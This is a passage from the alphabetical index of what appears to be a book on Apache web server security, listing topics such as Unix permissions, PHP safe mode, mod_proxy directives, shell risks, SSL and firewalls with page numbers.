80/20 rule, 73-74 
choosing, 70-73 
developing, 70-73 
integrating Apache, 71 
security, 73-74 
server functions, 70-73 
server integration, 70-73 
tech support, 70-73 
Unix, 75-76 
Windows, 79-85 
operators, hosts options, 388 
options, apxs tools, 165-166 
OPTIONS method (<Limit> directives), 472 
Oracle, 96 
Apache tools, 100-102 
default accounts, 97 
vulnerabilities, 97-99 
ownership 
Unix, 136 
Windows, 140-141 


P 


packets 
analyzing, 371 
filtering (firewalls), 372 
IPSEC, 123 
padding (DES), 426 
PAM Auth tool (authentication), 252 
parent process ID. See PPID 
parselog (logging tools), 195 
PassEnv directive, 497 
passwords 
Anonymous directive, 476 
Anonymous_MustGiveEmail directive, 478 
authentication, 225, 238-239 
HTTP, 238-239 
BIOS, 60 
console, 60 
directories, 233-235 
encryption, 42 
files, 305, 310 
protecting, 475 
routines, 310 
storing, 246-247 
using e-mail addresses, 477-478 
patch maintenance, 116 
PATCH method (<Limit> directive), 472 
patching Apache, 354-355 
paths 
avoiding risks, 294 
CGI, 271-273 
hackers, 292-294 
relative, 271-273 
server-side code, 294 
patterns, random numbers, 338, 340, 342 
performance 
MySQL, 90-92 
tracking, 161 
Perl, 256 
chdir(), 273 
eval, 266 
exec(), 266 
open(), 264-265 
proxy tools, 409 
random numbers, 341-342 
permissions, 135 
basic concepts, 136 
importance, 135 
JavaScript, 298 
logging, 185-186 
Unix, 78, 136 
adding, 138 
assigning, 138 
changing, 138 
chmod, 138 
Execute, 136 
octal system, 139 
owners, 138 
Read, 136 
tokens, 136 
Write, 136 
Windows, 136, 140-141 
ACL, 141 
changing, 141-142 
permutations (DES), 426 
PHP, 256, 273 
disable functions, 279-281 
environment, 275, 278 
escapeshellarg(), 282 
escapeshellcmd(), 282 
internal procedures, 283-284 
remote attackers, 282 
risks, 274-282 
safe mode, 278-279 
directives, 279 
establishing, 278-279 
PHP modules, MySQL, 91-92 
physical security, 57 
common threats, 57 
NOC, 58 
server location, 58 
PID (process ID), 340, 342 
PidFile directive, 498 
piggybacking, system() call, 258 
PingLogger (logging tools), 199 
piping logs, 187-191 
constants, 189 
popen(), 260 
avoiding, 260 
portmap service, 50 
POST method (<Limit> directive), 472 
PostgreSQL, 95 
modules, 95-96 
tools, 95-96 
PPID (parent process ID), 340-342 
preferences (users), 497 
preventing 
metacharacters (PHP), 282 
with testing tools, 286-287 
process ID. See PID 
process models, 431-432 
programming 
committing functions, 285-286 
PHP, 274-278 
server-side, 256-257 
tools, 286-287 
programming errors, 255 
programming practices, security, 88-89 
PROPFIND method (<Limit> directive), 473 
PROPPATCH method (<Limit> directive), 473 
proprietary databases, 88-89 
protecting 
directories, 233-235 
passwords, 475 
protocol, blocking, 371 
proxy control, 24 
proxy servers (Apache as firewall), 374-379 
establishing, 382 
mod_proxy, 376-379 
proxy tools, 402 
mod_fortress, 402, 405 
mod_ip forwarding, 405 
mod_limitipconn, 406 
mod_rpaf, 407 
mod_tproxy, 408 
Web resources, 409 
ProxyBlock directive, 498 
mod_proxy, 378 
ProxyDomain directive, 498 
mod_proxy, 379 
ProxyErrorOverride directive (mod_proxy), 379 
ProxyMaxForwards directive (mod_proxy), 379 
ProxyPass directive (mod_proxy), 379 
ProxyPassReverse directive (mod_proxy), 380 
ProxyPreserveHost directive (mod_proxy), 380 
ProxyReceiveBufferSize directive, 499 
mod_proxy, 380 
ProxyRemote directive, 499 
mod_proxy, 380 
ProxyRequests directive (mod_proxy), 381 
ProxyRequests directive, 499 
ProxyTimeout directive (mod_proxy), 381 
ProxyVia (mod_proxy), 381 
ProxyVia directive, 499 
public key cryptography, 338 
PUT method (<Limit> directive), 473 
Python, 256 

Q 


quick reference, Apache API, 575-594 


R 


R services, 48 
rexecd, 48 
rlogind, 48 
rshd, 48 
rand(), 341 
random numbers, 338-342 
C, 343 
LavaRand, 339 
Perl, 341-342 
RC2 block cipher, 423, 426 
read permissions (Unix), 136 
RealAudio, 49 
recompiling Apache, 382 
records, hardware, 67 
Red Creek Ravlin 7160 firewall, 416 
Redirect directive, 145 
redirection, URL, 143-146 
RedirectMatch directive, 145 
reference (HTTP status codes), 176-177 
rejecting user authentication, 226-232 
relative paths, 271-273 
remote attackers (PHP), 282 
remote proxies, 499 
remote users, NFS, 47-48 
removing permissions (Unix), 138 
replays, IP Authentication Header Protocol, 121 
request objects, 586 
requests, satisfying, 576-578 
resource allocation, 586-588 
clean up, 587 
resources 
biometric identification, 65 
block ciphers, 422-424 
breach statistics, 34-40 
CGI, 288 
controlling, 157-161 
IPv6, 130-131 
memory, 161 
module developing, 466-467 
source tree, 335 
Web, 555 
response header modules, 580 
restricting 
resources, 157-161 
user access, 42 
virtual hosts, 222 
retinal scans, 64-65 
choroid layer, 64-65 
cones, 64-65 
RewriteBase directive, 151 
RewriteCond directive, 151 
triggers, 152-154 
RewriteEngine directive, 148 
RewriteLock directive, 149 
RewriteLog directive, 148 
RewriteLogLevel directive, 149 
RewriteMap directive, 149 
RewriteOptions directive, 148 
RewriteRule directive, 154 
flags, 155 
rexecd service (Remote Execution Server), 48 
risks, 33 
AOL Instant Messenger, 49 
Apache history, 111-115 
CGI 
code, 257 
environment, 257 
tools, 257 
code, 33 
defacement, 45 
executing shell commands, 258-261 
exposed source code, 292-294 
internal commands with user input, 258-261 
intruders, 33 
LDAP, 49 
NFS (Network File System), 47-48 
PHP, 274-284 
RealAudio, 49 
shells, 260 
SMB, 56 
total system seizure, 45 
Unix shells, 75-76 
user input, 281-282 
Web server, 49 
Windows, 79-85 
writing paths, 294 
Yahoo! Messenger, 49 
RLimitCPU directive, 160 
RLimitMEM directive, 161 
RLimitNPROC directive, 161 
rlogind service (Remote Login Server), 48 
root directory, specifying location, 501 
ROT-13, 420 
router-based firewalls, 373 
routers, firewall, 371 
routines (logging), 174-175 
passwords, 310 
RSA authentication, 337 
rshd service (Remote Shell server), 48 
rules 
firewalls, 372 
syslog, 180-183 


S 


safe mode (PHP), 278-279 
establishing, 278-279 
SAFER block cipher, 424 
Same Origin Policy, 298 
satisfying requests, 576, 578 
screening user input, 281-282 
ScriptAlias directive, 146 
ScriptAliasMatch directive, 146 
Secure Root, breach example, 35 
Secure Sockets Layer. See SSL 
securing laptops, 66 
security, 471 
AccessFileName directive, 475 
accounting, 23 
anonymous users, 490 
AuthAuthoritative, 479 
authorizing information, 481 
basic security considerations, 23 
BIOS passwords, 60-61 
breaches, development, 41-43 
CGI, 257, 496 
CSI breach statistics, 34-40 
databases, 29, 104 
example issues, 505-553 
files, 305, 311-313 
Informix, 102-104 
IPv6, 128 
<Limit> directive, 471-472 
<LimitExcept> directive, 473 
logging, 23, 197 
MySQL, 92-94 
operating systems, 73-74 
Oracle, 97-99 
passwords, 476 
physical, 57 
proprietary databases, 88-89 
source tree, 305-309 
user input, 270 
<VirtualHost> directive, 474 
Web resources, 555 
Security Descriptor (SID), 140-141 
serialization, child processes, 158 
SERVER_BUSY_LOG constant, 172 
server tools 
ab, 161-162 
apachectl, 161 
apxs, 161 
suexec, 161 
server-side code, paths, 294 
server-side programming, 256-257 
ServerAdmin directive, 500 
ServerAlias directive, 500 
ServerName directive, 501 
ServerPath directive, 501 
ServerRoot directive, 501 
servers 
applications, 586, 588 
basic security considerations, 23 
client-side programming risks, 295 
housing, 58 
identifying, 501 
location, 58 
physical location, 58 
server-side programming, 256-257 
testing (httpsd), 361-362 
ServerSignature directive, 502 
services, 28, 49-50 
SetEnvIf directive, 191, 193 
setting 
cookie time frames, 483 
error log location, 178 
stack size, 161 
URL path, 501 
user ID, 502 
Windows IP security, 397 
SHA, 402 
shell languages, 256 
shells (Unix), 75-76 
avoiding functions, 257 
common metacharacters, 258 
environment, 261-264 
environment variables, 76-77 
eval, 266 
metacharacters, 76 
piggybacking, 258 
popen(), 260 
security, 260 
system(), 258-259, 261 
SID (Security Descriptor), 140-141 
signatures (attacks), 372 
sites, Web resources, 555 
SMB (Server Message Block Protocol), 53 
risks, 56 
smbd service, 50 
SOCKS (proxy servers), 374-379 
software 
open source, 26 
patch maintenance, 116 
permissions, 136 
source code 
exposed, 292-294 
mod_auth_ip example, 455-461 
mod_fortress example, 436-453 
source files 
Apache C, 312, 314 
mod_ssl, 344-346 
source tree, 305, 335 
security contexts, 305-309 
sources, committing functions, 285-286 
specifying 
administrative e-mail address, 500 
memory resources, 161 
root directory location, 501 
spelling, URL auto-corrects, 157 
split-logfile, log vulnerability, 186 
SQUARE block cipher, 424 
srand(), 341 
SSI (Server-Side includes), 495 
access control, 220 
support, 495 
SSL (Secure Sockets Layer), 337, 427 
commercial packages, 368-369 
DES, 337 
directives, 347-348 
installing, 346-348 
mod_ssl, 343 
Netscape breach, 338 
PID, 340, 342 
PPID, 340, 342 
random numbers, 338-342 
RSA, 337 
vulnerability, 340, 342 
SSL authentication, 250 
client certificates, 250 
SSLeay, 350-353 
optimization flags, 353 
startup, xinetd, 391 
startup files, httpsd, 360 
stateless, 20 
statistics, Computer Security Institute, 34-40 
status codes (http), 176-177 
storing 
errors, 177-183 
httpd process ID, 498 
passwords (HTTP authentication), 246-247 
usernames (HTTP authentication), 246-247 
substitution ciphers, 420-421 
ROT-13, 420 
suexec tool, 161, 166 
support 
anonymous users, 23 
databases, 87 
supported ciphers, 428 
supporting languages, 255 
Swatch (logging tools), 198 
Symantec Enterprise VPN firewall, 416 
symbolic links (access control), 219 
syslog 
customizing, 180-183 
rules, 180-183 
syslogd daemons, 179 
system(), 258-261 
piggybacking, 258 
systems 
defacement, 45-46 
total seizure, 45-46 
unique identification, 67 


T 


TASC, breach example, 35 
tasks, files, 311-313 
Tcl, 256 
TCP Wrapper 
tcpdchk tool (configuration checker), 389 
tcpdmatch tool, 390 
TCP Wrappers, 383-387 
comparing with firewalls, 390 
hosts options 
EXCEPT operator, 388 
wildcards, 388 
tcpdchk (TCP Wrapper configuration checker), 389 
tcpdmatch tool (TCP Wrapper), 390 
TEA block cipher, 424 
tech support, operating systems, 70-73 
templates, 27 
testing 
access, 210 
code, 286-287 
servers (httpsd), 361-362 
testing tools, 286-287 
third-party servers 
client-side security, 295-297 
cross-site scripting, 296-297 
JavaScript attacks, 299 
threads, stack sizes, 161 
ThreadStackSize directive, 161 
Tim Berners-Lee, 19 
time-based access, 217-218 
tokens (Unix permissions), 136 
TomCat 3.2.3, 110 
tools 
ab, 161-162 
access control, 383 
TCP Wrappers, 385-387 
apachectl, 164 
htpasswd, 233-235 
logging, 193, 197 
Oracle, 100-102 
PostgreSQL, 95-96 
programming, 286-287 
tcpdchk (TCP Wrapper configuration checker), 389 
testing, 286-287 
topology. See network topology 
TRACE method (<Limit> directive), 473 
tracking 
cookies, 483 
performance, 161 
piped logs, 189 
user ID, 484 
user preferences, 497 
transactions, examples, 575 
transformations (DES), 426 
triggers, RewriteCond directive, 152-154 
Trusted Information Systems (TIS), firewalls, 373 
tunneling IPSEC, 122-125 


U 


unauthorized access, 33, 41 
unique identification, 67 
Unix 
complexities, 78 
ownership, 136 
permissions, 78, 136 
adding, 138 
changing, 138 
chmod, 138 
execute, 136 
group, 138 
octal system, 139 
owners, 138 
read, 136 
removing, 138 
tokens, 136 
write, 136 
risks, 75-76 
shells, environment variables, 76-77 
xinetd (eXtended InterNET services daemon), 390-391 
xinetd, 393-396 
UNLINK method (<Limit> directive), 473 
UNLOCK method (<Limit> directive), 473 
unpacking 
Apache, 354-355 
SSL, 350-353 
updating 
Apache, 109-110 
DBM files, 246-247 
URI handling, examples, 576, 578 
URL 
mapping, 143-157 
redirection, 143-146 
spelling correction, 157 
user access, 579 
user authentication, htpasswd, 234 
User directive, 502 
user ID, tracking, 484 
UserDir directive, 155-156, 503 
usernames, storing, 246-247 
users 
authentication, 25, 225-232 
buffer overruns, 267-270 
computer security, 295-297 
constructing commands with, 258-261 
denying access, 203 
finger directive, 47 
hackers, 270 
ID, setting, 502 
IDs, 579 
input, 270 
screening, 281-282 
validating, 281-282 
network access control, 203 
passwords, 42 
preferences, tracking, 497 
restricting access, 42 
tracking, 25 
utilities, dbmmanage, 246-247 


V 


validating 
e-mail passwords, 479 
user input, 281-282 
variable names, hackers, 292-293 
VBScript, 291, 300 
frame security, 301 
verifying 
e-mail passwords, 478-479 
user authentication, 226-232 
virtual hosts, 222 
<VirtualHost> directive, 132, 474 
viruses (Windows), 82 
vulnerabilities 
Informix, 102-104 
MySQL, 92-94 
Oracle, 97-99 


W 


W2K (Windows 2000), 397-401 
Watcher (logging tools), 199 
weaknesses, HTTP authentication, 238-239 
Web 
block cipher information, 422 
communications, 337 
database interaction, 256 
encryption, 338 
firewall vendors, 417-418 
proxy tool links, 409 
resources, 288, 555 
SSL, 337 
Web resources, biometric identification, 65 
Web servers 
basic, 23 
risks, 49 
wildcards, hosts options, 388 
Windows 
DoS vulnerabilities, 83-85 
environment variables, 79-85 
firewall capabilities, 397-401 
NETBEUI, 53 
NETBIOS, 51 
ownership, 140-141 
permissions, 136, 140-141 
changing, 141-142 
setting IP security, 397 
SMB, 53 
viruses, 82 
worms, 82 
WINNT.H (Windows permissions), 140-141 
workstations, anti-theft devices, 67 
worms 
Melissa, 83 
Windows, 82 
write permissions (Unix), 136 
writing 
server applications, 586, 588 
WWW. See Web 


X 


xcacls (Windows permissions), 141-142 
access masks, 142 
arguments, 142 
options, 142 
xinetd (eXtended InterNET services daemon), 390-391 
xinetd 
attributes, 393-396 
configuring, 392 
startup options, 391 
XML, 256 
XOR (exclusive-or), 422 


Y 


Yahoo! Messenger, 49 
ypbind service, 50 
ypserv service, 50 